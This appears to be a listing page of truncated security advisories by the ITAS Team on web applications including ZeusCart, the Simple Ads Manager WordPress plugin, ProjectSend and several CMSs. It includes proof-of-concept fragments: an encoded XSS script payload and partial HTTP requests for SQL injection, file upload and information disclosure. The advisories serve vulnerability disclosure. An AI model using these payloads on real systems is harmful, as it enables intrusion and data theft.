Cross-Site Scripting | Zeuscart V4

ert(/ITASVN/) #Fix version: N/A #Author: Dang Quoc Thai – thai.q.d...@itas.vn và ITAS Team ::PROOF OF CONCEPT:: + REQUEST GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1 Host: demo.target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko

Wordpress plugin Simple Ads Manager - Information Disclosure

/ #CVE ID: CVE-2015-2826 #Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 17 action=load_u

Wordpress plugin Simple Ads Manager - Arbitrary File Upload

: CVE-2015-2825 #Author: Tran Dinh Tien (tien.d.t...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: targer.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-

Wordpress plugin Simple Ads Manager - Multiple SQL Injection

/ #CVE ID: CVE-2015-2824 #Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Fir

Wordpress plugin Simple Ads Manager - SQL Injection

: CVE-2015-2824 #Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team ::PROOF OF CONCEPT:: ---SQL INJECTION 1--- + REQUEST: POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/

Community Gallery - Srored Corss-Site Scripting vulnerability

version: Community Gallery 2.0 after 12/26/2014 #CVE ID: CVE-2015-2275 #Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: + REQUEST: POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512 d9eed HTTP/1.1 Host: target User-A

ProjectSend r561 - SQL injection vulnerability

} else { $add_client_data_active = 0; } } } ::DISCLOSURE:: + 01/06/2015: Detect vulnerability + 01/07/2015: Contact to vendor + 01/08/2015: Send the detail vulnerability to vendor - vendor did not reply + 03/05/2015: Public information ::REFERENCE:: - http://www.itas.vn/news/itas-team-f

Radexscript CMS 2.2.0 - SQL Injection vulnerability

Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) :: PROOF OF CONCEPT :: POST /redaxscript/ HTTP/1.1 Host: target.local User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Ac

Fork CMS 3.8.3 - XSS Vulnerability

# Fixed version:Fork 3.8.4 # Author: Le Ngoc Phi - phi.n...@itas.vn & ITAS Team - www.itas.vn ::VULNERABILITY DETAIL:: - Vulnerable parameter: q_widget - Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php - Vulnerable function: loadForm() - Attack vector:

Microweber 0.95 - SQL Injection Vulnerability

version: Version 0.95 before 12/09/2014. # Fixed version:Version 0.95 updated on 12/11/2014 # Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn) ::VULNERABILITY DETAIL:: - A SQL injection vulnerability has been found and confirmed within the Microweber CM

Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities

0785ccede478f07) # CVE ID: CVE-2015-1428 # Vulnerability: SQL Injection # Affected version: Sefrengo CMS v1.6.1 # Fixed version:Sefrengo CMS v1.6.2 # Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team (www.itas.vn) ::PROOF OF CONCEPT:: Li